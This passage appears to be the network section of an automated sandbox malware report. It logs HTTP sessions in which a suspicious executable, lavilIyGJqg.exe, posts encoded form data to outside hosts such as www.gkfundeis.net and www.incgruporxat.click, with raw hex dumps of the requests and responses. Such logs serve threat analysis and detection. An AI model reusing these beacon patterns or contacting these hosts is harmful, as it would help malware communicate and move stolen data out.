                                                              Data Ascii: jp30l4Dh=KIF/4Uzdz85BC39bScDgUJbo/9Wkt9LBu+LKqKIaGkQSrXpa+1lWkPg4GfIfNXzKAkagsGkzET1IoSzrkvafonH0iI9ZQEYA1STRxvaRbwbIV41fesz3ddNCloy9v8SjzP30Twm9TgdLsVetqtndndmME8SaYzhfMDL3W3pacf4ZcgMjlhJJU+gokAD91pP25C0qjeOkd0O9ZhedX1NwwxzlbVOjCIlSHRId6fk=
                                                              Nov 24, 2024 08:35:56.225536108 CET413INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sun, 24 Nov 2024 07:35:56 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              X-Redirector-ID: b292ff989566f4631a5218f2045923e8f4a6dbc99eba46de6535556e5589b40f
                                                              Data Raw: 61 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 66 72 61 6d 65 73 65 74 3e 0a 09 3c 66 72 61 6d 65 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6d 78 2e 6e 65 74 2f 70 72 6f 64 75 6b 74 65 2f 68 6f 6d 65 70 61 67 65 2d 6d 61 69 6c 2f 68 6f 6d 65 70 61 67 65 2d 70 61 72 6b 65 6e 2f 22 3e 0a 3c 2f 66 72 61 6d 65 73 65 74 3e 0a 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: a1<!DOCTYPE html><html><head><title></title></head><frameset><frame src="http://www.gmx.net/produkte/homepage-mail/homepage-parken/"></frameset></html>0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              15192.168.2.74997662.116.130.880520C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 24, 2024 08:35:57.820583105 CET1758OUTPOST /zd1g/ HTTP/1.1
                                                              Host: www.gkfundeis.net
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Origin: http://www.gkfundeis.net
                                                              Referer: http://www.gkfundeis.net/zd1g/
                                                              Content-Length: 1253
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: max-age=0
                                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
                                                              Data Raw: 6a 70 33 30 6c 34 44 68 3d 4b 49 46 2f 34 55 7a 64 7a 38 35 42 43 33 39 62 53 63 44 67 55 4a 62 6f 2f 39 57 6b 74 39 4c 42 75 2b 4c 4b 71 4b 49 61 47 69 49 53 71 6b 52 61 38 57 39 57 6c 50 67 34 61 76 49 43 4e 58 79 50 41 6b 43 6b 73 47 34 4e 45 52 39 49 70 77 37 72 69 65 61 66 68 6e 48 30 71 6f 39 59 65 6b 5a 43 31 53 43 59 78 76 4b 52 62 77 62 49 56 36 74 66 63 2b 62 33 66 64 4e 42 69 6f 79 68 35 38 54 30 7a 50 76 43 54 77 53 48 55 52 39 4c 73 78 79 74 6d 2f 50 64 6c 39 6d 4f 48 38 53 43 59 7a 73 66 4d 43 6e 56 57 33 31 67 63 59 55 5a 5a 42 39 61 78 42 5a 4f 47 39 77 53 74 41 48 6b 31 2f 6e 38 36 54 6b 37 68 4e 65 2b 62 57 50 63 42 33 36 73 5a 78 46 79 78 41 33 50 61 56 32 6d 54 6f 5a 65 66 78 67 41 67 70 6d 45 51 32 39 47 73 4a 67 67 77 4c 69 47 77 35 59 37 61 71 4f 78 4e 53 61 45 66 73 78 73 34 76 45 58 47 66 79 51 61 66 63 43 69 78 72 33 61 54 52 59 6e 76 54 44 6c 49 71 79 56 2b 32 46 39 49 77 76 6a 4e 70 41 66 6e 47 56 46 47 52 79 59 77 69 77 67 5a 73 59 6a 2b 5a 50 72 69 79 33 33 57 36 50 45 [TRUNCATED]
                                                              Data Ascii: jp30l4Dh=KIF/4Uzdz85BC39bScDgUJbo/9Wkt9LBu+LKqKIaGiISqkRa8W9WlPg4avICNXyPAkCksG4NER9Ipw7rieafhnH0qo9YekZC1SCYxvKRbwbIV6tfc+b3fdNBioyh58T0zPvCTwSHUR9Lsxytm/Pdl9mOH8SCYzsfMCnVW31gcYUZZB9axBZOG9wStAHk1/n86Tk7hNe+bWPcB36sZxFyxA3PaV2mToZefxgAgpmEQ29GsJggwLiGw5Y7aqOxNSaEfsxs4vEXGfyQafcCixr3aTRYnvTDlIqyV+2F9IwvjNpAfnGVFGRyYwiwgZsYj+ZPriy33W6PEL3T8kWVwi/FHIhr6Jwu42NNVR5HXnVcRkeZPg4AJaHdk7qHJoztgKbVn5JYuD7Wk+4WHX2gBcH5IxXRDJViii/DOTlBdD5hGdcVFf/w+P67U12izT8oC5SFxmyiYSwh42Z2/BhkSKaJjWd0VrNi/o2SYDORgmfXdxLbEf5LjUK37a61CQvyid/ryAcu6nbRgX6NxSThP8j8vE2mlKAuTS0FM4OjlYr5CX75HOmwhL8Fl8Tmd/GhO83N4ww1i/WQqc89vPacjfIYhyx5ZahRb+Cdcqm4jkgCI1L/H+edKXAwW8dyk+XZniVjygI5KsL2/dq4NcrNPgfe+/bFfNin+WH+M5Ol9LmBZI363JD724mu71G9UFSZKLa/gVlsxAV4mv1lkAz9dHO0GAKzwCQMigE5cozC9SzRDCY3yQAuK2KDaMNGQo1+cGMbMFk70XAEtNhKLrO6VWrLXCeBPfyhQZioL2OwOgb8KuFTEz4iSHZf1qsjBf8FmP1PJWe6LHPuhkWuwXReNxIH4V8x4ki5nt2/3W79AUk6VkTx4MpwuhQxVRWX0TBWyOd0FG5gC603I4hwIa2uTS6fAXcUpkKb0Q8paiTooPXVTEfsRg07YBGTkROwBvnn/0UcWKiaEgr+5ANer/lX4PLbyI2MUQQ6kmdR9PAigqOd1rc [TRUNCATED]
                                                              Nov 24, 2024 08:35:59.096466064 CET413INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sun, 24 Nov 2024 07:35:58 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              X-Redirector-ID: b292ff989566f4631a5218f2045923e8f4a6dbc99eba46de6535556e5589b40f
                                                              Data Raw: 61 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 66 72 61 6d 65 73 65 74 3e 0a 09 3c 66 72 61 6d 65 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6d 78 2e 6e 65 74 2f 70 72 6f 64 75 6b 74 65 2f 68 6f 6d 65 70 61 67 65 2d 6d 61 69 6c 2f 68 6f 6d 65 70 61 67 65 2d 70 61 72 6b 65 6e 2f 22 3e 0a 3c 2f 66 72 61 6d 65 73 65 74 3e 0a 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: a1<!DOCTYPE html><html><head><title></title></head><frameset><frame src="http://www.gmx.net/produkte/homepage-mail/homepage-parken/"></frameset></html>0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              16192.168.2.74998462.116.130.880520C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 24, 2024 08:36:00.485506058 CET460OUTGET /zd1g/?jp30l4Dh=HKtf7if1wssFCwsMZKrQBqjHrNWMjveBtffsr+YOEAp7lFw99HVIkLojFbUmNxvgDUS8qVNfPxg+hDfTlsysjjiIjpBTY2hB1FuC/Ir2XG7/Tel/P9K0Q44ikc2AwKvVyevXJzSbTSZU&Yh8=pl0prhRpj HTTP/1.1
                                                              Host: www.gkfundeis.net
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-US
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
                                                              Nov 24, 2024 08:36:01.804045916 CET436INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sun, 24 Nov 2024 07:36:01 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              X-Redirector-ID: b292ff989566f4631a5218f2045923e8f4a6dbc99eba46de6535556e5589b40f
                                                              IX-Cache-Status: MISS
                                                              Data Raw: 61 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 66 72 61 6d 65 73 65 74 3e 0a 09 3c 66 72 61 6d 65 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6d 78 2e 6e 65 74 2f 70 72 6f 64 75 6b 74 65 2f 68 6f 6d 65 70 61 67 65 2d 6d 61 69 6c 2f 68 6f 6d 65 70 61 67 65 2d 70 61 72 6b 65 6e 2f 22 3e 0a 3c 2f 66 72 61 6d 65 73 65 74 3e 0a 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: a1<!DOCTYPE html><html><head><title></title></head><frameset><frame src="http://www.gmx.net/produkte/homepage-mail/homepage-parken/"></frameset></html>0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              17192.168.2.749989104.21.88.13980520C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 24, 2024 08:36:07.301098108 CET740OUTPOST /ryxy/ HTTP/1.1
                                                              Host: www.incgruporxat.click
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Origin: http://www.incgruporxat.click
                                                              Referer: http://www.incgruporxat.click/ryxy/
                                                              Content-Length: 221
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: max-age=0
                                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
                                                              Data Raw: 6a 70 33 30 6c 34 44 68 3d 30 6c 6e 57 31 64 71 49 4f 55 64 30 2f 32 58 36 7a 4c 7a 62 69 4d 71 4c 71 34 77 4b 44 6e 59 44 2f 66 43 71 69 46 35 6b 5a 63 71 79 57 72 50 51 33 59 79 6a 72 52 52 65 6a 44 48 57 70 77 67 63 48 71 77 6c 4f 64 76 57 56 31 6c 6e 6b 75 52 68 57 56 4b 62 65 6f 45 43 59 74 34 41 61 41 5a 7a 36 58 52 6f 62 53 63 62 77 50 59 48 38 67 41 6e 75 41 63 50 51 72 51 61 48 32 52 37 56 72 6a 38 34 38 72 56 67 36 54 75 68 61 6d 39 38 4b 34 76 31 7a 45 31 79 71 71 59 4d 76 57 30 4b 76 75 4d 5a 72 72 75 39 57 66 53 35 38 78 35 30 49 4a 4b 55 71 44 7a 39 42 46 64 37 50 35 74 4f 38 61 56 7a 4a 34 43 31 65 7a 32 39 45 53 37 4e 41 66 48 59 41 3d 3d
                                                              Data Ascii: jp30l4Dh=0lnW1dqIOUd0/2X6zLzbiMqLq4wKDnYD/fCqiF5kZcqyWrPQ3YyjrRRejDHWpwgcHqwlOdvWV1lnkuRhWVKbeoECYt4AaAZz6XRobScbwPYH8gAnuAcPQrQaH2R7Vrj848rVg6Tuham98K4v1zE1yqqYMvW0KvuMZrru9WfS58x50IJKUqDz9BFd7P5tO8aVzJ4C1ez29ES7NAfHYA==
                                                              Nov 24, 2024 08:36:08.551302910 CET1236INHTTP/1.1 404 Not Found
                                                              Date: Sun, 24 Nov 2024 07:36:08 GMT
                                                              Content-Type: text/html
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                              pragma: no-cache
                                                              x-turbo-charged-by: LiteSpeed
                                                              cf-cache-status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qI%2FFZtvzqyw6tju3SWm6I5iqKM99PTyN1F1rg1QMZKzrQne0S9XGAbMUVGx5GTMcakOrWtxU3fiEmaBooDGemoP5cgF95Rw4yYkTbM%2BL%2By1ClT09gWfTCMQS9CLobxBX%2BR7woSojiWw5"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8e77b9eb5b356a57-EWR
                                                              Content-Encoding: gzip
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1688&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=740&delivery_rate=0&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                              Data Raw: 32 63 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 ed 8a db 3a 10 fd 1f e8 3b cc 7a 29 74 21 de c8 59 87 16 db 31 2d fd a0 17 4a ef 42 17 2e fd 29 5b e3 68 58 59 72 a5 89 93 b4 f4 dd 2f 72 92 fd 68 35 20 4b e3 33 a3 99 33 23 55 17 1f fe 7d 7f f7 fd f6 23 68 ee 4d 3d ab e2 07 02 1f 0c ae 13 8d b4 d1 5c 64 42 bc 4c e2 2f 94 aa 9e 55 3d b2 04 2b 7b 5c 27 23 e1 6e 70 9e 13 68 9d 65 b4 bc 4e 76 a4 58 af 15 8e d4 62 3a 6d e6 40 96 98 a4 49 43 2b 0d ae b3 39 04 ed c9 de a7 ec d2 8e 78 6d 5d 02 8b 7a 56 31 b1 c1 1a 72 91 c3 57 c7 f0 c9 6d ad 7a 31 ab 16 47 7d 35 05 55 bf ed 51 91 84 57 83 c7 0e 7d 48 5b 67 9c 4f 43 ab b1 c7 42 49 7f 7f f5 ab 71 ea f0 ab 91 ed fd c6 47 17 47 48 71 29 84 b8 a0 3e 86 2b 2d ff fe 5d 2d 8e 0e ab c5 29 af 68 76 ce fc 68 02 97 79 9e 97 d0 4b bf 21 5b 88 b2 73 96 0b b0 ce f7 d2 40 96 0f fb c5 52 0c 7b 78 e7 49 9a 39 7c 46 33 22 53 2b e7 10 a4 0d 69 40 4f 5d 09 4f 48 2c e1 af a8 e0 b2 eb ba 32 b2 ab 68 fc 83 77 b9 65 57 42 4f 36 7d e6 23 a9 21 8e a7 06 8c 7b 4e a5 a1 8d 2d a0 45 cb [TRUNCATED]
                                                              Data Ascii: 2cddT:;z)t!Y1-JB.)[hXYr/rh5 K33#U}#hM=\dBL/U=+{\'#npheNvXb:m@IC+9xm]zV1rWmz1G}5UQW}H[gOCBIqGGHq)>+-]-)hvhyK![s@R{xI9|F3"S+i@O]OH,2hweWBO6}#!{N-EK
                                                              Nov 24, 2024 08:36:08.551362991 CET405INData Raw: 98 b8 2f de 08 31 ec cf 29 a4 06 3b 2e 20 cd 8f ca c1 05 62 72 b6 90 4d 70 66 cb 58 02 bb a1 80 9b 78 ca 04 5d 89 97 31 36 38 8d 4a 67 e7 13 1f 38 81 48 4a 1a e8 27 16 d9 6a 72 6b c8 e2 43 c4 47 d5 84 d9 1d 55 8d 33 aa 4c ea 5c e4 d5 42 67 b1 ad
                                                              Data Ascii: /1);. brMpfXx]168Jg8HJ'jrkCGU3L\Bg1Hln>^j4[Z5chhk/P>O(=5M'<r9SSM[!E@G#F,[c]>ylo:J8OP=gH4Orr


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              18192.168.2.749990104.21.88.13980520C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 24, 2024 08:36:09.960706949 CET760OUTPOST /ryxy/ HTTP/1.1
                                                              Host: www.incgruporxat.click
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Origin: http://www.incgruporxat.click
                                                              Referer: http://www.incgruporxat.click/ryxy/
                                                              Content-Length: 241
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: max-age=0
                                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
                                                              Data Raw: 6a 70 33 30 6c 34 44 68 3d 30 6c 6e 57 31 64 71 49 4f 55 64 30 2b 55 44 36 78 6f 62 62 6a 73 71 45 32 6f 77 4b 4b 48 59 48 2f 66 47 71 69 45 39 4b 61 70 61 79 56 4c 2f 51 6c 4d 65 6a 69 42 52 65 70 6a 48 54 32 67 68 53 48 71 38 48 4f 5a 6e 57 56 31 42 6e 6b 76 68 68 57 47 53 59 45 59 45 4d 4e 39 34 43 48 77 5a 7a 36 58 52 6f 62 53 59 78 77 4a 77 48 38 51 77 6e 76 68 63 4d 5a 4c 51 5a 41 32 52 37 45 37 6a 34 34 38 71 47 67 2f 76 45 68 59 75 39 38 49 67 76 73 42 73 79 37 71 72 52 49 76 58 35 47 4b 58 72 63 6f 2f 63 30 32 4c 39 6a 64 5a 68 78 2b 49 6f 4f 49 50 66 6a 51 39 6d 2f 4e 64 62 5a 61 48 67 78 49 38 61 34 38 48 58 69 7a 33 52 41 53 2b 44 4f 78 38 36 77 77 34 79 77 44 6d 2b 47 78 6a 79 2b 6b 78 62 65 59 63 3d
                                                              Data Ascii: jp30l4Dh=0lnW1dqIOUd0+UD6xobbjsqE2owKKHYH/fGqiE9KapayVL/QlMejiBRepjHT2ghSHq8HOZnWV1BnkvhhWGSYEYEMN94CHwZz6XRobSYxwJwH8QwnvhcMZLQZA2R7E7j448qGg/vEhYu98IgvsBsy7qrRIvX5GKXrco/c02L9jdZhx+IoOIPfjQ9m/NdbZaHgxI8a48HXiz3RAS+DOx86ww4ywDm+Gxjy+kxbeYc=
                                                              Nov 24, 2024 08:36:11.250920057 CET1236INHTTP/1.1 404 Not Found
                                                              Date: Sun, 24 Nov 2024 07:36:11 GMT
                                                              Content-Type: text/html
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                              pragma: no-cache
                                                              x-turbo-charged-by: LiteSpeed
                                                              cf-cache-status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kSkx2FhE7dBH3OWiky2Oayu7vTWLQCkaANK5jgKQtMQXwDRrYBfd62%2BDuwmeuCL%2FXmnAy5ZSB9nRVsTySOTU65dFlf8us3PXiDxtk0UO0Lxffo2rkXfS9cgK6z4Y41cU5TBMkC5FClxe"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8e77b9fc2bb8c346-EWR
                                                              Content-Encoding: gzip
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1686&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=760&delivery_rate=0&cwnd=178&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                              Data Raw: 32 64 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 ed 8a db 3a 10 fd 1f e8 3b cc 7a 29 74 21 de c8 59 87 16 db 31 2d fd a0 17 4a ef 42 17 2e fd 29 5b e3 68 58 59 72 a5 89 93 b4 f4 dd 2f 72 92 fd 68 35 20 4b e3 33 a3 99 33 23 55 17 1f fe 7d 7f f7 fd f6 23 68 ee 4d 3d ab e2 07 02 1f 0c ae 13 8d b4 d1 5c 64 42 bc 4c e2 2f 94 aa 9e 55 3d b2 04 2b 7b 5c 27 23 e1 6e 70 9e 13 68 9d 65 b4 bc 4e 76 a4 58 af 15 8e d4 62 3a 6d e6 40 96 98 a4 49 43 2b 0d ae b3 39 04 ed c9 de a7 ec d2 8e 78 6d 5d 02 8b 7a 56 31 b1 c1 1a 72 91 c3 57 c7 f0 c9 6d ad 7a 31 ab 16 47 7d 35 05 55 bf ed 51 91 84 57 83 c7 0e 7d 48 5b 67 9c 4f 43 ab b1 c7 42 49 7f 7f f5 ab 71 ea f0 ab 91 ed fd c6 47 17 47 48 71 29 84 b8 a0 3e 86 2b 2d ff fe 5d 2d 8e 0e ab c5 29 af 68 76 ce fc 68 02 97 79 9e 97 d0 4b bf 21 5b 88 b2 73 96 0b b0 ce f7 d2 40 96 0f fb c5 52 0c 7b 78 e7 49 9a 39 7c 46 33 22 53 2b e7 10 a4 0d 69 40 4f 5d 09 4f 48 2c e1 af a8 e0 b2 eb ba 32 b2 ab 68 fc 83 77 b9 65 57 42 4f 36 7d e6 23 a9 21 8e a7 06 8c 7b 4e a5 a1 8d 2d a0 45 cb [TRUNCATED]
                                                              Data Ascii: 2d8dT:;z)t!Y1-JB.)[hXYr/rh5 K33#U}#hM=\dBL/U=+{\'#npheNvXb:m@IC+9xm]zV1rWmz1G}5UQW}H[gOCBIqGGHq)>+-]-)hvhyK![s@R{xI9|F3"S+i@O]OH,2hweWBO6}#!{N-EK/
                                                              Nov 24, 2024 08:36:11.250972986 CET396INData Raw: 08 31 ec cf 29 a4 06 3b 2e 20 cd 8f ca c1 05 62 72 b6 90 4d 70 66 cb 58 02 bb a1 80 9b 78 ca 04 5d 89 97 31 36 38 8d 4a 67 e7 13 1f 38 81 48 4a 1a e8 27 16 d9 6a 72 6b c8 e2 43 c4 47 d5 84 d9 1d 55 8d 33 aa 4c ea 5c e4 d5 42 67 b1 ad 96 cf 9d a6
                                                              Data Ascii: 1);. brMpfXx]168Jg8HJ'jrkCGU3L\Bg1Hln>^j4[Z5chhk/P>O(=5M'<r9SSM[!E@G#F,[c]>ylo:J8OP=gH4OrrG


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              19192.168.2.749991104.21.88.13980520C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 24, 2024 08:36:12.617458105 CET1773OUTPOST /ryxy/ HTTP/1.1
                                                              Host: www.incgruporxat.click
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Origin: http://www.incgruporxat.click
                                                              Referer: http://www.incgruporxat.click/ryxy/
                                                              Content-Length: 1253
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: max-age=0
                                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
                                                              Data Raw: 6a 70 33 30 6c 34 44 68 3d 30 6c 6e 57 31 64 71 49 4f 55 64 30 2b 55 44 36 78 6f 62 62 6a 73 71 45 32 6f 77 4b 4b 48 59 48 2f 66 47 71 69 45 39 4b 61 6f 4f 79 56 35 33 51 33 39 65 6a 34 42 52 65 33 7a 48 6f 32 67 67 4f 48 71 30 44 4f 5a 71 74 56 33 70 6e 31 39 35 68 42 6e 53 59 4b 6f 45 4d 50 39 34 44 61 41 5a 71 36 57 68 73 62 52 77 78 77 4a 77 48 38 53 59 6e 6f 77 63 4d 66 4c 51 61 48 32 52 33 56 72 6a 41 34 38 69 57 67 2b 62 2b 67 6f 4f 39 39 6f 77 76 75 55 77 79 6e 36 72 66 45 50 57 71 47 4b 54 30 63 72 4c 71 30 31 58 58 6a 63 74 68 79 34 64 4d 65 63 50 4c 34 58 42 34 67 4c 39 34 65 70 48 72 34 6f 6b 67 2b 66 37 5a 75 51 7a 74 49 77 53 56 50 55 78 49 67 67 78 44 37 7a 75 50 43 45 53 5a 72 48 6c 6d 61 59 67 77 4f 35 6c 36 43 6e 78 30 6f 76 69 30 39 4f 45 54 7a 6d 67 6c 2b 43 59 62 30 50 76 52 79 6d 79 32 34 4b 56 70 6c 77 32 39 39 77 75 4f 79 69 39 2b 6b 4e 44 50 34 6f 4e 64 39 61 43 51 55 62 4a 70 4d 78 6c 6c 57 35 64 71 71 6f 61 76 4e 4b 43 42 6d 31 59 48 59 43 6c 69 41 73 6e 2b 50 4a 41 5a 56 [TRUNCATED]
                                                              Data Ascii: jp30l4Dh=0lnW1dqIOUd0+UD6xobbjsqE2owKKHYH/fGqiE9KaoOyV53Q39ej4BRe3zHo2ggOHq0DOZqtV3pn195hBnSYKoEMP94DaAZq6WhsbRwxwJwH8SYnowcMfLQaH2R3VrjA48iWg+b+goO99owvuUwyn6rfEPWqGKT0crLq01XXjcthy4dMecPL4XB4gL94epHr4okg+f7ZuQztIwSVPUxIggxD7zuPCESZrHlmaYgwO5l6Cnx0ovi09OETzmgl+CYb0PvRymy24KVplw299wuOyi9+kNDP4oNd9aCQUbJpMxllW5dqqoavNKCBm1YHYCliAsn+PJAZVINR4QrWYNOTAjavYSPggarnqMuijoneZ7TdwRFzRGru0EaT8iCUEBOWBcf6OPkFYeUEIzSUbWK54IcPoXj07CGCbIkN6OIGmHj9Zt8qKeTpELx0c9cKNUoB4WCkD9dxFWL/IytciVtTBq+XKoCfjWEYTTp1eAL6tLzbha3p4R5JOygt9Phv1IWg6j/JBhXinvX1KpoBQt1uouBwjbiGkCgydaE5v3PvgV3TR2hnZiDDVwbNi8Fdc7svu7HWUUPUjCIRb1PNlWXVFNXyj4T8FwCIOvNMrXRbJ8y3e4FU177VJQ9vBEtvP9MPcnld+uAHm5jaAUe/RViK6P1gYe9lWZ7lKkHBGbeFaLv+ywvis/6DizuRzAVExB61dDAGw7gwCY3wi5BxHll1DMr/qKG9cwgRJdcIW5i9tWVeBO8f5VqBM/GaF20L0fiSgP43xm7u4gt/vdM32m0H3OvbLUhjXBOWKlQQHbgAZ4jGQEjjsDTU/bUj6LVrkLEb14n85vi9wCen43FnwjdhGdVakVQI9PVghueW+vjD73jJj6RUmkCWU8GfmftuMxHOFtQNrSky1EqB5i9SQXMqEMUcDZuQwKb+7aOyTPQZCwxP4bjOKX/zw90N7xiI0LVjeFbC4+sHLYWUz/Vgjj0zkGKtBkp14TkBRtk5Ni2cQzS [TRUNCATED]
                                                              Nov 24, 2024 08:36:13.959289074 CET1236INHTTP/1.1 404 Not Found
                                                              Date: Sun, 24 Nov 2024 07:36:13 GMT
                                                              Content-Type: text/html
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                              pragma: no-cache
                                                              x-turbo-charged-by: LiteSpeed
                                                              cf-cache-status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r3nEfo0nDxmkXvQ2Yvt3miIdHOcV059kkDYAPKMg9Zzdyrfd9kMOtAvrxyDbMbsw2KICV1PHK3aTB52mM%2BT8Cjs%2FBuU6slLLVPRhJGX4T5eiWs7Nk92qPjhfran3%2Ftd%2FHnOwuupv5YKn"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8e77ba0d1f850c88-EWR
                                                              Content-Encoding: gzip
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1689&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1773&delivery_rate=0&cwnd=215&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
